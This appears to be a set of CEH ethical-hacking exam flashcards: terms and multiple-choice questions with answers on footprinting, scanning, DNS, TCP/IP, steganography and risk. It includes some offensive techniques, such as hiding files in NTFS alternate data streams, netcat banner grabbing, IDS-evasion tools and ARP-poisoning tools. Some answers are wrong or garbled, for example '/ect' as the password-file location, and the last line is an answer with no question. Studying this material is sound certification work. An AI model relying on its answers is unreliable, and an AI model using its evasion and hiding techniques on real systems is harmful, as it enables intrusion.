If you want to find information about a company's technical infrastructure you can look where?
nbtstat -c
If you want to show the cache using NetBIOS.
Least Significant Bit Insertion Masking and Filtering Algorithms and Transformation
Image File Steganography Techniques
OpenStego QuickStego CrytaPix Hide In Picture gifshuffle PHP-Class Stream Steganography
Image Steganpgraphy Tools
loading an external dylib (dynamic library)
In OS X, applications while ___, the loader searches for dylib in multiple directories
bit flipping
In ____, the attacker isn't interested in learning the entirety of the plain-text message. Instead, bits are manipulated in the cipher text itself to generate a predictable outcome in the plain text once it is decrypted.
Administrative safeguards
In a risk assessment, data classification and background checks are examples of which type of safeguard?
information is hidden in image
In image steganography, the ___ files of different formats such as .PNG, .JPG, .BMP, etc
Internet DMZ
In networking, it's a controlled buffer network between you and the uncontrolled chaos of the Internet.
black-box testing
In penetration testing, a method of testing the security of a system or subnet without any previous knowledge of the device or network. It is designed to simulate an attack by an outside intruder (usually from the Internet).
Evil Twin
In what type of attack does an attacker set up a wireless access point that is configured to look exactly like a company's valid wireless access point by using the same SSID?
Hiding files
In which CEH hacking stage do you use steganography?
send a "SYN" (session establishment)
One way to determine whether a port is open is to ___ packet to the port
E. SOA (Start of Authority)
One way to mitigate against DNS poisoning is to restrict or limit the amount of time records can stay in cache before they're updated. Which DNS record type allows you to set this restriction? A. NS B. PTR C. MX D. CNAME E. SOA
Stealth (also called half-open scan or SYN scan)
Only SYN packets are sent to ports (no completion of the three-way handshake ever takes place).
C. They are mitigating the risk
Organization leadership is concerned about social engineering and hires a company to provide training for all employees. How is the organization handling the risk associated with social engineering? A. They are accepting the risk. B. They are avoiding the risk. C. They are mitigating the risk. D. They are transferring the risk.
bypass firewall
Organizations have security mechanisms that only check incoming ICMP packets but not outgoing ICMP packets, therefore attackers can easily ___.
Conduct
Other than Preparation and Conclusion, what is the third phase of the Software Assurance Maturity Model?
Internet
Outside the boundary and uncontrolled. You don't apply security policies to this zone.
This flag forces the delivery of data to communications.
PSH (Push)
gathering of competitive intelligence using search engines perusing social media sites dumpster dive gaining network ranges raiding DNS information
Passive footprinting methods
SmartWhois Domain Dossier
Perform WHOIS footprinting using tools such as ___ , etc. to create detailed map of organizational network, to gather personal information that assists to perform social engineering, and to gather other internal network details, etc.
eMailTrackerPro PoliteMail Email Lookup-Free Email Tracker
Perform email footprinting using tools such as ___ , etc. to gather information about the physical location of an individual to perform social engineering that in turn may help in mapping target organization's network
Path Analyzer Pro VisualRoute Network Pinger
Perform network footprinting using tool such as ___ , etc. to create a map of the target's network
HTTrack Web Site Copler BlackWidow Webripper
Perform website footprinting using tools such as ___, etc. to build a detailed map of website's structure and architecture
Angry IP Scanner SolarWinds Engineer Toolset's Ping Sweep Colasoft Ping Tool Advanced IP Scanner Visual Ping Tester - Standard Ping Sweep Ping Scanner Pro Network Ping OpUtils Ping Monitor PingInfoView Pinkie
Ping Sweep Tools
locating active devices firewall
Ping scan is useful for ____ or determining if ICMP is passing through a ___
A or AAAA
Points to a host's IP address
MX
Points to domain's mail server
TFTP (UDP)
Port number 69
secretly monitors and records all activities
Power Spy ___ on your computer
Proxy Switcher Proxy Workbench TOR CyberGhost SocksChain Fiddler Burp Suite Proxy Proxifier Protoport Proxy Chain Proxy Tool Windows App ProxyCap Charles CCProxy
Proxy Tools
Doxing
Publishing personally identifiable information about an individual collected from publicly available databases and social media
A)Smurf attack
Recently, your company's security practitioner suggested that you disable all routers from accepting broadcast ping messages. Which type of attack will this protect against? A)Smurf attack B)TCP RST attack C)MITM attack D)OSPF attack
modify the registry, change local admin passwords, disable local accounts
RemoteExec allows attackers to ___, and copy/update/delete files and folders
"all hosts" link local multicast address
Scanning IPv6 network, however, offers a large number of hosts in a subnet if an attacker can compromise one host in the subnet; attacker probe the ___
Nmap
Scanning Tool
dialers port scanners network mappers ping tools vulnerability scanners
Scanning can use what type of tools
IPv6
Scanning in __ networks is more difficult and complex than the IPv4 and also some scanning tools do not support ping sweeps on __ networks
Nmap Angry IP Scanner SolarWinds Engineer Toolset Network Ping OPUtils SuperScan Advanced IP Scanner Pinkie
Scanning tools (ping sweep, etc):
Qualys FreeScan
Scans computers and apps on the Internet or in your network Tests websites and apps for OWASP Top Risks and malware
PsLoggedOn
See who's logged on locally and via resource sharing
bluejacking
Sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, and laptop computers.
Viruses
Social engineering can use all the following except ____ Mobil phones Instant messaging Trojan horses Viruses
Eavesdropping Shoulder surfing Dumpster diving Impersonation on social networking sites
Social engineering techniques:
Adware
Software that has advertisements embedded within it. It generally displays ads in the form of pop-ups.
Guardster Ultrasurf Psiphon Tails
Some anonymizers:
Company websites and employment ads Search engines, Internet, and online DB Press releases and annual reports Trade journals, conferences, and newspaper Patent and trademarks Social engineering employees Product catalogues and retail outlets Analyst and regulatory reports Customer and vendor interviews Agents, distributors, and suppliers
Sources of competitive intelligence
communicate secretly
Spam emails help to ___ by embedding the secret messages in some way and hiding the embedded data in the spam emails
B) UDP 514
Standardized in 2001 by IETF, Syslog is a protocol for sending event messages and alerts across a network, specifically an IP network. As an ethical hacker, these log files may be of great use. Which transport protocol and port number should you be looking for in a packet capture to view syslog data? A) TCP 110 B) UDP 514 C) UDP 110 D) TCP 161 E) TCP 514
-Open the command prompt with an elevated privilege -Type the command "type C:\SecretFile.txt > C:\LegitFile.txt:SecretFile.txt" (Here, file is kept in C drive where SecretFile.txt file is hidden inside LegitFile.txt file) -To view the hidden file type "more < C:\SecretFile.txt" (For this you need to know the hidden file name)
Steps to hide file using NTFS
cipher text
Text or data in its encrypted form; the result of plain text being input into a cryptographic algorithm.
sh-compatible shell
The BASH is an ___ which stores command history in a file called bash_history
IDS/Firewall
The IP address decoy technique makes is difficult for the ____ to determine which IP address was actually scanning the network and which IP addresses were decoys
D. DNS poisoning
The IT staff is notified that the company's website has been defaced. A security employee, working from home, visits the site and sees the message "YOU HAVE BEEN HACKED" on the front page. He then reboots the system, VPN's to the internal network, and visits the site again, this time noticing nothing out of place. What is the most likely explanation? A. ARP poisoning B. MAC poisoning C. SQL injection D. DSN poisoning
A)Microsoft Windows
The MBSA vulnerability tool is specifically designed to locate potential exploits in which operating systems? A)Microsoft Windows B)Mac OS X C)Cisco IOS D)UNIX/Linux
Reconnaissance Scanning and Enumeration Gaining Access <-- Escalation of Privileges Maintaining Access Covering Tracks
The Phases of ethical hacking
SYN/FIN Scanning Using IP Fragments
The TCP header is split into several packets so that the packet filters are not able to detect what the packets intend to do
Application Presentation Session
The TCP/IP model Application layer is what in the OSI model layer?
Data Link Physical
The TCP/IP model Network Access layer is what in the OSI model layer?
Transport
The TCP/IP model Transport layer is what in the OSI model layer?
private
The ___ community string is used for read-write.
SAM
The ___ database holds encrypted versions of all the local passwords for accounts on the machine.
performance and CPU optimizations
The ___ in the processors such as branch prediction, out of order execution, caching, and speculative execution lead to these vulnerabilities
preparation
The ___ phase defines the time period during which the actual contract is hammered out. The scope of the test, the types of attacks allowed, and the individuals assigned to perform the activity are all agreed upon .
conclusion or post-assessment
The ___ phase defines the time when final reports are prepared for the customer, detailing the findings of the tests (including the types of tests performed) and many times even providing recommendations to improve security.
Accountability
The ability to trace actions performed on a system to a specific user or system entity.
Hacktivism
The act or actions of a hacker to put forward a cause or a political agenda, to affect some societal change, or to shed light on something he feels to be a political injustice. These activities are usually illegal in nature.
Refresh time
The amount of time a secondary DNS server will wait before asking for updates. The default value is 3,600 seconds (1 hour).
Retry time
The amount of time a secondary server will wait to retry if the zone transfer fails. The default value is 600 seconds.
escalate privileges
The attacker can ______ to obtain complete control of the system. In the process, intermediate systems that are connected to it are also compromised
Continuing access Unnoticed and uncaught
The attacker's intentions include: ____ to the victim's system, remaining ____, deleting evidence that might lead to his prosecution
Discretionary access control (DAC)
The basis of this kind of security is that an individual user, or program operating on the user's behalf, is allowed to specify explicitly the types of access other users (or programs executing on their behalf) may have to information under the user's control.
least Significant Bit Insertion
The binary data of the message is broken and inserted into the LSB of each pixel in the image file in a deterministic sequence
Availability
The condition of a resource being ready for use and accessible by authorized users.
Transformation
The data is embedded in the cover image by changing the coefficients of a transform of an image
Active Directory (AD)
The directory service created by Microsoft for use on its networks. It provides a variety of network services using Lightweight Directory Access Protocol (LDAP), Kerberos-based authentication, and single sign-on for user access to network-based resources.
A)All of these
The following access list is applied to an interface on a Cisco router: access-list 1 permit 192.168.5.0 0.0.255.255 access-list 1 deny host 192.168.5.2 Which of the following IP addresses would be allowed through the interface? A)All of these B)192.168.5.2 C)None of the above D)192.168.7.20 E)192.168.10.60 F)192.168.5.5
Expire time
The maximum amount of time a secondary server will spend trying to complete a zone transfer. The default value is 86,400 seconds (1 day).
TTL (Time To Live)
The minimum for all records in the zone. If not updated by a zone transfer, the records will perish. The default value is 3,600 seconds (1 hour).
B)False positive
The new NIDS (Network Intrusion Detection System) recently prevented a user from accessing resources remotely to which he should have access. Which type of alert does this represent? A)True negative B)False positive C)True positive D)False negative
C) HTTP tunneling
The penetration team is separated from potential targets by firewall; however a penetration test member discovers port 80 is open. Which of the following techniques is the best choice to attempt sending data and/or commands to a target system behind the firewall? A) MAC flooding B) Session splicing C) HTTP tunneling D) Firewalking
unique number
The second half of the MAC address is a _____ burned in at manufacturing to ensure no two cards on any given subnet will have the same address.
B)Classify and prioritize
The security professionals working for your company have designed the procedures for incident handling and response. Today you received a notification of a virus infection. You successfully analyze the virus infection that has affected only your company's file servers. What is the next step you should complete? A)Contain B)Classify and prioritize C)Notify D)Investigate
Reconnaissance
The steps taken to gather evidence and information on the targets you want to attack.
Netcat
Tool for banner grabbing:
Tenable's Nessus Retina CS Microsoft Baseline Security Analyzer (MBSA) GFI LanGuard Qualys FreeScan OpenVAS
Vulnerability scanners:
LanWhoIs HotWhois Batch IP Converter ActiveWhois CallerIP WhoisThisDomain Whois Lookup Multiple Addresses SoftFuse Whois WhoIs Analyzer Pro Whois Domain Dossier Whois BetterWhois DNSstuff Whois Online Network Solutions Whois Web Wiz WebToolHub Network-Tools.com UltraTools
WHOIS Lookup Tools
Regional Internet Registries personal information of domain owners
WHOIS databases are maintained by ____ and contain the _____.
Domain name details Contact details of domain owner Domain name servers NetRange When a domain has been created Expiry records Records last updated
WHOIS query returns:
WebSite-Watcher VisualPing Follow That Page Versionista WatchThatPage OnWebChange
Web Updates Monitoring Tools
download a website to a local directory
Web mirroring tools allow you to ___, building recursively all directories, HTML, images, flash, videos, and other files from the server to your computer
HTTrack (www.httrack.com) Black Widow (http://softbytelabs.com) WebRipper (www.calluna-software.com) Teleport Pro (www.tenmax.com) GNU Wget (www.gnu.org) Backstreet Browser (http://spadixbd.com)
Web site mirroring tools:
B. Layer 4
What OSI layer does SSL operate in? A. Layer 7 B. Layer 4 C. Layer 3 D. Layer 2
Frame
What PDU is at Layer 2 of OSI model
Packet
What PDU is at Layer 3 of OSI model
Segment
What PDU is at Layer 4 of OSI model
RFC 5952
What RFC addresses IPv6 truncation?
Web spiders
What are applications that crawl through a website, reporting information on what they find?
HTTrack Web Site Copier SurfOffline BlackWidow PageNest NCollector Studio Backstreet Browser Website Ripper Copier Offline Explorer Enterprise Teleport Pro GNU Wget Portable Offline Browser Hooeey Webprint
What are some Mirroring tools available with the two most popular first?
Make activity on the Internet untraceable Allow you to bypass Internet censors
What can anonymizers do?
D)Perform testing through a firewall
What can network vulnerability scanners NOT do? A)Find wired and wireless network vulnerabilities B)Scan for open ports and listening services C)Find operating system and security configuration weaknesses D)Perform testing through a firewall
Service oriented architecture (SOA) vulnerability
What class of vulnerability is an XML denial of service attack?
1) # nc -vv www.juggyboy.com 80 (press ENTER) 2) GET / HTTP/1.0 (press ENTER twice)
What command is used for Banner Grabbing using Netcat?
tshark
What command launches a CLI version of Wireshark?
traceroute tracert
What command line tool can help map a network, and tracks a packet across the Internet and provides the route path and transit times?
nslookup
What command line tool is used to query DNS servers for information?
set query=mx
What command would you use to tell nslookup to find records on e-mail servers?
Cain & Abel
What common tool can be used for launching an ARP poisoning attack?
1) Host is not alive 2) Host might not respond to ICMP
What could a nonresponse to ICMP indicate?
Logs
What could be used to monitor application errors and violations on a web server or application?
Hub
What device will neither limit the flow of traffic not have an impact on the effectiveness of sniffing?
B) Time exceeded
What does ICMP type 11, code 0, indicate? A) Redirect B) Time exceeded C) Echo Request D) Echo return
Server's public key
What does a client use to encrypt the session key in an SSL connection?
Destination unreachable, because the router has no route to the network on which the destination resides
What does an ICMP Type 3/Code 6 error message indicate?
C)Displays current firewall settings at a high level
What does the command netsh firewall show config do? A)Enables Windows firewall B)Provides an option to add rules to the configuration C)Displays current firewall settings at a high level D)Displays all rules within Windows Firewall
Ports
What does the enumeration phase not discover?
D. It defines the location of the Snort rules.
What does this line from the Snort configuration file indicate? var RULE_PATH c:\etc\snort\rules A. The configuration variable is not in the proper syntax. B. It instructs the Snort engine to write rule violations in this location. C. It instructs the Snort engine to compare packets to the rule set named "rules." D. It defines the location of the Snort rules.
C) AES
What encryption standard does WPA2 use? A) RC4 B) RC5 C) AES D) SHA-1
A)NTFS
What file system is the alternate data streams (ADS) vulnerability designed to exploit? A)NTFS B)VMFS C)FAT D)UFS
C. SYN/ACK
What flag or flags are sent in the segment during the second step of the TCP three-way handshake? A. SYN B. ACK C. SYN/ACK D. ACK/FIN
Risk mitigation
What happens when a control is implemented to reduce the impact of a risk?
Risk acceptance
What happens when no control is used to address a particular risk?
Asymmetric routing
What is called when traffic between point A and point B takes one route to get there and another to return?
A vulnerability exposed in the OpenSSL cryptographic library allowing attackers to steal server private keys and user session cookies and passwords.
What is heartbleed?
Buffer overflow
What is it called when a program, while writing data to memory, overruns the memory boundary and overwrites adjacent memory locations?
Tailgating
What is it called when an unauthorized person enters the facility by following an authorized person who has successfully authenticated to the physical access system?
ACK
What is missing from a half-open scan?
Difficult to install
What is not a benefit of hardware keyloggers?
A vulnerability exposed in the Unix Bash shell allowing attackers to execute arbitrary commands.
What is shellshock?
Reused code that still contains vulnerabilities
What is shrinkwrap code?
technology platforms employee details login pages intranet portals
What is some of the information extracted during Footprinting through Search Engines?
The Computer emergency response teams (CERT) are expert groups that handle computer security incidents.
What is the CERT?
0xffffffffffff
What is the Layer 2 Ethernet broadcast address?
C) FF:FF:FF:FF:FF:FF
What is the MAC address in broadcast frames? A) AA:AA:AA:AA:AA:AA B) 11:11:11:11:11:11 c) FF:FF:FF:FF:FF:FF D) 99:99:99:99:99:99
dig @server name type server = name or IP of the DNS name server name = name of the resource you're looking for type = the type of record you want to pull
What is the basic syntax for using dig?
C)512-bit blocks with an output of 160 bits
What is the block and output size of SHA1? A)1088-bit blocks with an output of 256 bits B)1024-bit blocks with an output of 256 bits C)512-bit blocks with an output of 160 bits D)512-bit blocks with an output of 128 bits
D)191.43.167.255
What is the broadcast address for the subnet 191.43.164.0/22? A)191.43.255.255 B)191.43.164.255 C)191.43.165.255 D)191.43.167.255
protocol.field operator value
What is the generic syntax of a Wireshark filter?
To evade detection by the IDS
What is the goal of session fragmentation and session splicing attacks?
investigating web resources and competitive intelligence mapping out network ranges mining whois and DNS social engineering e-mail tracking Google hacking
What is the logical flow that footprinting follows?
End-user training
What is the most efficient protection control against a social engineering attack?
Operating system and version
What is the most valuable information you can gain from a banner grab?
Steganography
What is the term for hiding messages or information within other non-secret text or data?
Key escrow
What is the term for placing copies of private keys used to encrypt data in the safekeeping of a third party organization?
Residual risk
What is the term for risk that sill exists after security controls have been applied?
Factorization
What is the term for the decomposition of a value into a product of other values that give the original value when multiplied together?
Redundancy or fault tolerance
What is the term for the implementation of backup systems to prevent loss of access to resources?
D)Factorization
What is the term for the process of determining two numbers that can be multiplied together to equal a given starting value? A)Trapdooring B)Derivation C)Hashing D)Factorization
Vulnerability linkage
What is the term for the process of identifying sets of vulnerabilities that can be used to penetrate a network?
War chalking
What is the term for writing wireless access information on the side of a building?
The opening of a TCP connection
What is the three-way handshake?
To fill the MAC table with nonexistent MAC addresses, causing the switch to flood all frames out all interfaces and allowing the attacker to receive frames normally not allowed to see
What is the ultimate goal of a MAC flood attack?
Cookie
What is used to store session information?
C)Public key
What item is contained in the digital certificate that that enables the receiver of the certificate to send an encrypted email to the sender? A)Private key B)Signature C)Public key D)Serial number
Business of functional manager
What job role is in charge of ensuring systems and information assets for a unit are used to accomplish business objectives?
Facilities manager
What job role is on charge of addressing physical risks to the facility?
Get recipient's system IP address Geolocation of the recipient When the email was recieved and read Whether or not the recipient visited any links sent to them Get recipient's browser and operating system information Time spent on reading the emails
What kind of information can be gathered through email tracking?
Network Access
What layer of the TCP/IP model has the following protocols: ARP, L2TP, STP, HDLC, FDDI, Etc.?
Application
What layer of the TCP/IP model has the following protocols: HTTP, FTP, SNMP, SMTP, DNS, POP, IMAP, NNTP, Telnet, SSH, DHCP, etc.
Internet
What layer of the TCP/IP model has the following protocols: IP, ICMP?
Transport
What layer of the TCP/IP model has the following protocols: TCP, UDP?
Encryption
What may be helpful in protecting the content on a web server from being viewed by unauthorized personnel?
C. By manipulating the Time-To-Live (TTL) parameter
What method does traceroute use to map routes traveled by a packet? A. By carrying a hello packet in the payload, forcing the host to respond B. By using DNS queries at each hop C. By manipulating the Time-To-Live (TTL) parameter D. By using ICMP Type 5, Code 0 packets
Promisccuous Mode
What mode must be configured to allow a NIC to capture all traffic on the wire?
netstat -an
What netstat command displays all connections and listening ports, with addresses and port numbers in numerical form.
National Institute of Standards and Technology (NIST)
What organization has as its official mission to promote U.S. innovation and industrial competitiveness?
C) /ect
Where is the password file kept on a Linux machine? A) /dev B) /config C) /ect D) /com
D. Calling the company's help desk line E. Employing passive sniffing
Which of the following activities are not considered passive footprinting? (Choose two.) A. Dumpster diving B. Reviewing financial sites for company information C. Clicking links within the company's public website D. Calling the company's help desk line E. Employing passive sniffing
B)Mitigate C)Accept E)Avoid
Which of the following are acceptable methods for handling risk? (Choose all that apply.) A)Ignore B)Mitigate C)Accept D)Reject E)Avoid
B. Enable DHCP snooping on the switch. D. Configure DHCP filters on the switch.
Which of the following are the best preventive measures to take against DHCP starvation attacks? (Choose two.) A. Block all UDP port 67 and 68 traffic. B. Enable DHCP snooping on the switch. C. Use port security on the switch. D. Configure DHCP filters on the switch.
A) They are used to identify networks C) They can be a maximum of 32 characters
Which of the following are true regarding SSIDs? A) They are used to identify networks B) They are used to encrypt traffic on networks C) They can be a maximum of 32 characters D) They can be a maximum of 16 characters
B) It is used to encryption of passwords on Windows NT machines D) It uses a 128 bit key
Which of the following are true regarding Syskey? (Choose all that apply) A) It is used in encryption of passwords on certain Linux systems B) It is used to encryption of passwords on Windows NT machines C) It uses a 256 bit key D) It uses a 128 bit key
A)Theft of a password by a coworker or remote contractor
Which of the following attacks can NOT be effectively mitigated by file permissions? A)Theft of a password by a coworker or remote contractor B)Posing as the server after a successful authentication to gain access to data C)Intercepting and modifying unsigned SMB packets to gain access to data D)Posing as the client machine after a successful authentication to gain access to data
A. XSS
Which of the following attacks lets you assume a user's identity at a dynamically generated web page? A. XSS B. SQL Injection C. Session Hijacking D. Zone transfer
B)ARP poisoning
Which of the following attacks occurs at the Data Link layer of the OSI model? A)IP address spoofing B)ARP poisoning C)Rogue DHCP server D)Cross-site scripting
A) Using a protocol in a way it was not originally intended to be used
Which of the following best defines "covert channel"? A) Using a protocol in a way it was not originally intended to be used B) An application using a port that is not well known C) A hacker using a browser to look at the company's public website D) A wireless connection
A) Using a protocol in a way it was not originally intended to be used
Which of the following best defines "covert channel"? A) Using a protocol in a way not originally intended to be used B) An application using a port that is not well known C) A hacker using a browser to look at the company's public website D) A wireless connection
B. Security tokens
Which of the following best defines a logical or technical control? A. Air conditioning B. Security tokens C. Fire alarms D. Security policy
B. Injecting parameters into a connection string using semicolons as separators
Which of the following best describes a connection stream parameter pollution attack? A. Injecting the same name into multiple parameters within an HTTP request B. Injecting parameters into a connection string using semicolons as separators C. Adjusting session identifiers to explicit, known values D. Injecting JavaScript code into multiple input parameters
Directory traversal
Which of the following is used to access content outside the root of a website?
B. An external DNS server is Active Directory integrated.
Which of the following may be a security concern for an organization? A. The internal network uses private IP addresses registered to an Active Directory--integrated DNS server. B. An external DNS server is Active Directory integrated. C. All external name resolution requests are accomplished by an ISP. D. None of the above.
D) All of the above
Which of the following may be used in a fully switched subnet to improve sniffing efforts? A) MAC Flooding B) ARP Spoofing C) Span Ports D) All of the above
IP DHCP Snooping
Which of the following prevents ARP poisoning?
B)SOAP
Which of the following protocols or standards formats information in XML? A)CORBA B)SOAP C)DCOM D)OLE
A) Common Criteria
Which of the following refers to an international standard that provides a set of requirements for evaluation? A) Common Criteria B) ISO 9600 C) DEV 201 Series D) The Blue Book
A) Check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies
Which of the following represents EC-Council's scanning methodology? A) Check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies B) Check for open ports, check for live systems, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies C) Perform banner grabbing, check for live systems, check for open ports, scan for vulnerabilities, draw network diagrams, and prepare proxies D) Draw network diagrams, check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, and prepare proxies
D)Sensitive information was obtained from a stolen company laptop
Which of the following scenarios could be prevented by using EFS? A)DDoS attack makes the network inaccessible for four hours B)Thieves breaking into the server room and damaging the servers C)Sensitive data captured with a sniffer during transmission D)Sensitive information was obtained from a stolen company laptop
C)Conducting security assessments on network resources
Which of the following security actions is intended to validate existing systems? A)Recording the steps taken when upgrading network servers. B)Deploying a new configuration to a router C)Conducting security assessments on network resources D)Assigning responsibilities to the technical team
A)Auditing
Which of the following security tools should be examined before implementation to gauge its effects on performance? A)Auditing B)Vulnerability scanner C)Wireless sniffer D)Antivirus software
C) Defense in depth
Which of the following sets up many, varying security controls to protect an organization's IT resources? A) Single sign-on B) Overt channels C) Defense in depth D) Multilayer firewall
A)Network range of protected IP addresses B)Excluded rule files
Which of the following settings can be specified in the Snort configuration file? (Choose all that apply.) A)Network range of protected IP addresses B)Excluded rule files C)XOR encoders for NOPS D)FIN, URG and PUSH flags for TCP headers
C. Technical details and procedures
Which of the following should not be included in a security policy? A. Policy exceptions B. Details on noncompliance disciplinary actions C. Technical details and procedures D. Supporting document references
C) UDP 514
Which of the following standard ports must be opened on the firewall to allow log messages to be sent to a log analysis tool? A) UDP 123 B) TCP 123 C) UDP 514 D) TCP 514
C)Most serious threat the organization faces
Which of the following statements BEST describes disgruntled employees? A)Less of a threat than black hat hackers, but more of a threat than gray hat hackers B)Less of a threat than gray hat hackers, but more of a threat than white hat hackers C)Most serious threat the organization faces D)Pose no threat to the organization
A)They invented RSA encryption C)The system they devised provides compression and restorability D)The algorithm named after them performs encryption
Which of the following statements are FALSE with regard to Whitfield Diffie and Martin Hellman? (Choose all that apply.) A)They invented RSA encryption B)They invented public key encryption C)The system they devised provides compression and restorability D)The algorithm named after them performs encryption
A)It was replaced by the program ipchains C)It controls the packet filter or firewall capabilities
Which of the following statements are true of the program ipfwadm? (Choose all that apply.) A)It was replaced by the program ipchains B)It is a program written for Windows C)It controls the packet filter or firewall capabilities D)It has additional code that filters for fragmented packets
C)It is a form of mutual authentication.
Which of the following statements is NOT true about RSA SecurID? A)It uses a password only once. B)It is a form of two-factor authentication. C)It is a form of mutual authentication. D)Passwords stolen through a phishing attacks will fail.
D. Port scanning is used to identify potential vulnerabilities on a target system.
Which of the following statements is true regarding port scanning? A. Port scanning's primary goal is to identify live targets on a network. B. Port scanning is designed to overload the ports on a target in order to identify which are open and which are closed. C. Port scanning is designed as a method to view all traffic to and from a system. D. Port scanning is used to identify potential vulnerabilities on a target system.
C. When accepting the communications request, the recipient responds with an acknowledgement and a randomly generated sequence number in the second step.
Which of the following statements is true regarding the TCP three-way handshake? A. The recipient sets the initial sequence number in the second step. B. The sender sets the initial sequence number in the third step. C. When accepting the communications request, the recipient responds with an acknowledgement and a randomly generated sequence number in the second step. D. When accepting the communications request, the recipient responds with an acknowledgment and a randomly generated sequence number in the third step.
D)Security policies are technology specific.
Which of the following statements regarding security policies is NOT true? A)Security policies reduce legal liability to third parties. B)Security policies protect companies from threats. C)Security policies protect confidential and proprietary information. D)Security policies are technology specific.
B)Take ownership of a file
Which of the following tasks cannot be performed using cacls.exe, but is supported by xacls.exe? A)Display permissions to a file B)Take ownership of a file C)Modify an ACL D)Assign permissions to a folder
D)John the Ripper
Which of the following technical assessment tools is used to test passwords for weakness? A)Tripwire B)Snort C)Nmap D)John the Ripper
A)Prone to a man-in-the-middle attacks E)Maps 48-bit addresses to 32-bit addresses
Which statements are true of ARP? (Choose two.) A)Prone to a man-in-the-middle attacks B)Maps 48-bit addresses to host names C)Resistant to man-in-the-middle attacks D)Maps 32-bit addresses to host names E)Maps 48-bit addresses to 32-bit addresses
The last step involves returning any systems to their state prior to the pen test, which can include removing or cleaning up user accounts created externally as a result of the test (Clearing Tracks)
Which step in a penetration test is sometimes called "cleaning up"?
Disgruntled employees
Which threat agent poses the biggest threat to the disclosure of sensitive data?
C)Disclosure of sensitive data
Which threat poses the highest impact to the organization by a disgruntled employee? A)Introduction of stress into the work environment B)Negative effect on morale C)Disclosure of sensitive data D)Low productivity
XCACLS.exe
Which tool can take ownership of a file from the Windows command line?
fragroute
Which tool is used to intercept, modify, and rewrite egress traffic destined for the specified host in such a way that a NIDS cannot recognize the attack signatures?
D)WirelessMon E)Vistumbler F)NetStumbler
Which tool(s) are used to discover a nearby Wi-Fi network or device? (Choose all that apply.) A)Skyhook B)AirPcap C)Wireshark D)WirelessMon E)Vistumbler F)NetStumbler
B)Botnet zombies
Which trait differentiates a DoS attack from a DDoS attack? A)Injected code B)Botnet zombies C)Spoofed IP address D)SYN flood
Point-to-Point Protocol (PPTP)
Which tunneling protocol operates at the Data Link layer and uses Microsoft Point-to-Point Encryption (MPPE) to protect the connection?
A)Provide third party access to data B)Facilitate recovery operations
Which two of the following are goals of key escrow agreements? A)Provide third party access to data B)Facilitate recovery operations C)Enhance the security of public keys D)Enhance the security of private keys
B. TCP 53
You are told to monitor a packet capture for any attempted DNS zone transfer. Which port should you focus your search on? A. TCP 22 B. TCP 53 C. UDP 22 D. UDP 53
D)Deploy the smart cards to control building access and the biometrics to control data center access.
You must design physical security for a new building your company is building. You need to select the appropriate physical control for the building itself, for the network wiring closets, and for the data center located in the building. You have been given the funds to implement smart cards and biometrics. You need to keep the cost of these systems as low as possible. Where should you deploy these systems? A)Deploy the biometrics to control building access and the smart cards to control data center access. B)Deploy the biometrics to control building access and the smart cards to control wiring closet access. C)Deploy the smart cards to control building access and the biometrics to control wiring closet access. D)Deploy the smart cards to control building access and the biometrics to control data center access.
B)Bluebugging D)SMiShing F)Jailbreaking/rooting
You must determine the possible vulnerabilities that could be exploited on your company's mobile devices. Which of the following attacks are ONLY targeted at mobile platforms? (Choose all that apply.) A)Drive-by downloading B)Bluebugging C)Man-in-the-middle D)SMiShing E)Clickjacking F)Jailbreaking/rooting
A)Validate all inputs C)Protect data D)Implement appropriate access controls F)Implement error and exception handling G)Encode data
You must work with application designers to ensure that a new Web application adheres to OWASP's Top 10 Proactive Controls. Which of the following are part of this? (Choose all that apply.) A)Validate all inputs B)Implement detailed error messaging C)Protect data D)Implement appropriate access controls E)Disclose data F)Implement error and exception handling G)Encode data
A)x86/opty2
You need to create a NOP slide using the Metasploit Framework. Which module should you use? A)x86/opty2 B)0xf3af1000 C)x86/xor D)0xd503201f
A)PGP
You need to deploy an asymmetric encryption mechanism that will sign, encrypt, and decrypt emails to increase the security of e-mail communications. Which encryption mechanism should you implement? A)PGP B)IPSec C)3DES D)SHA1
D)Netstumbler
You need to detect 802.11b wireless networks in the area. Which product should you use? A)AirSnort B)Retina C)Network Mapper D)Netstumbler
C)Fragmenting the attack payload
You need to determine how attackers can evade an intrusion detection system (IDS). Which of the following best describes session splicing? A)Spoofing the attack source B)Encoding the attack payload C)Fragmenting the attack payload D)Disabling the attack target
B)Router ACL
You need to ensure that malicious packets are prevented from entering your private network. Packets should be evaluated based on the following criteria: -Source IP addresses -Protocol and port number Which type of security tool will use only these criteria to deny access? A)NTFS permissions B)Router ACL C)NIPS D)NIDS
B. Closed
You receive a RST-ACK from a port during a SYN scan. What is the state of the port? A. Open B. Closed C. Filtered D. Unknown
Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https Device type: general purpose|firewall|router|broadband router|WAP|terminal Running: Linux 3.X|2.6.X|2.4.X Network Distance: 12 hops
You run the following command: nmap -p21,80,443 -sV -O 45.33.32.156 What is the most likely partial output? A) Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https B) Host is up (0.029s latency). Not shown: 992 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 80/tcp open http 135/tcp filtered msrpc 443/tcp filtered https C) Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https Device type: general purpose|firewall|router|broadband router|WAP|terminal Running: Linux 3.X|2.6.X|2.4.X Network Distance: 12 hops D) Host is up (0.029s latency). PORT STATE SERVICE 21/tcp closed ftp 80/tcp open http 443/tcp filtered https
D. sc query state=all
You want to display active and inactive services on a Window Server machine. Which of the following commands best performs this service? A. sc query B. sc query type=all C. sc query type=service D. sc query state=all
A)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range.
